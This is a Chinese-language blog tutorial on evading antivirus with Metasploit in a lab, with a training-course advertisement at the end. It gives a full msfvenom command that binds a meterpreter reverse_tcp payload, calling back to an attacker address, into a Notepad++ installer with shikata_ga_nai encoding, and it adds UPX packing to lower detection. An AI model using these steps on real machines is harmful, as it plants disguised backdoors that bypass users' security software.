【kali笔记】MSF内网渗透，免杀过360

~ 我惭携宝剑，只为看山来 ~

前言

免杀，全称为反杀毒技术（Anti Anti-Virus），是一种能使病毒或木马免于被杀毒软件查杀的技术。

免杀技术的定义与原理

定义：免杀技术通过修改病毒、木马的内容或者特征码，使其能够躲避杀毒软件的查杀。

原理：杀毒软件通常通过识别病毒或木马的特征码来检测和清楚恶意软件。免杀技术通过修改这些特征码，使病毒或木马在杀毒软件的检测下“隐身”。

免杀的分类

免杀技术可以根据不同的标准进行分类，下面是两种常见的分类方式：

按是否有源代码分类

开源免杀：指在病毒、木马源代码的前提下，通过修改源代码进行免杀。

手工免杀：指在仅有病毒、木马的可执行文件（如.exe文件，即PE文件）的情况下进行免杀。

按免杀方式分类

文件免杀和查杀：在不运行程序的前提下使用杀毒软件进行对该程序的扫描。

内存的免杀和查杀：通过运行程序后，使用杀毒软件的内存查杀功能或特定的工具（如OD）进行查杀。

MSF免杀的实验

裸奔木马

1、在Kali中直接使用Msfvenom生成木马文件，不做任何免杀处理，如下图：

打开服务器

传输到靶机

直接就被杀了

我们先信任该文件，保存到本地，用其他的木马分析平台看看

在线杀毒

腾讯哈勃分析系统

好家伙，未发现风险。。。。。

沙箱

国家计算机病毒协同分析平台

恶意是正常的，但我看到了如下结果，360没有检测出结果！！！

打开360，经过评测，这个平台不行 。。

上述测试结果仅为参考，VirusTotal拥有超过40种反病毒引擎，但仍不能保证扫描通过的文件绝对安全，因为威胁总在不断演进。事实上，无软件能确保100%检测病毒与恶意软件，杀毒软件旨在最大化用户保护。该平台支持邮件提交或直接上传文件进行分析，且每15分钟更新病毒库，以最新反病毒引擎检测多数潜在威胁。

MSF编码

在Meatsploit框架中，一种免杀方法是利用MSF编码器。该编码器能重新排列和编码攻击载荷文件，从而改变可执行代码的形态，以躲避杀毒软件的检测。具体来说，MSF编码器能将原始可执行程序转换为一个新的二进制文件。运行此新文件时，MSF编码器会在内存中解码并执行原始程序。

查看所有的编码格式

msfvenom -l encoder

Metasploit 自带了用于捆绑木马程序的程序模板，其位置在data/templates/template.exe ，虽然这个模板经常会更新，但是其仍是各大反病毒木马厂商的关注点。为了更好的实现免杀，此处自主选择一个待捆绑程序。

3、使用以下命令生成 Windows环境下的木马、并捆绑到npp.7.8.5.installer.exe文件上，

下载地址：

https://notepad-plus-plus.org/downloads/v7.8.5/

同时对木马文件进行x86/shikata_ga_nai编码方式的免杀处理：

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.68 lport=4444 -e x86/shikata_ga_nai -x npp.7.8.5.Installer.exe -i 12 -f exe -o ./npp.exe

每项参数

将木马文件传输给靶机

用到 multi/handler 模块配置如下

双击运行，这里是运行着腾讯电脑管家的。

成功上线

电脑管家

360免杀了。。。。。。我怀疑我装了个假的360。

沙箱

VirusTotal 41/73 的查杀率

UPX加壳

UPX打包器原理简单：压缩可执行文件，附加解压缩代码。运行时先解压，再执行。其旨在反调试、防逆向。此用打包器，为改变后门特征码。

1、Kali 内置了 upx 工具，执行 upx 命令可查看简略的参数介绍：

2、执行以下命令，对刚才生成的木马文件进行加壳处理：

将加壳后的木马传到靶机，360检测，还是免杀。。。。垃圾360

执行这个exe程序，成功

加壳后的virustotal查杀率 36/72 明显比之前41/73查杀率，要低了不少

总结

免杀与反免杀的较量永无止境。本文所述方法目前有效，但技术日新月异，免杀需不断实践与创新，方能在实战中立于不败之地。

结语

学网安，来星河飞雪网络安全人才培训计划，OSEP，5年红队经验大佬系统【真*免费教学】不收一分钱，学渗透，来飞雪，高度活跃的交流群，保持强烈的竞争力，课程完结后经过考核即可内推红队，保底月薪2w，来看看我们的课程安排吧，后台回复【星河飞雪】即可加群，凭第一篇笔记报名奥，tmd不要加老子，去找小蛋糕！！！

来看看学员体验

免费系统教学，还自掏腰包，现在还有哪个老师这样啊。

我没谈恋爱。。。单身狗，求你带走。

往期推荐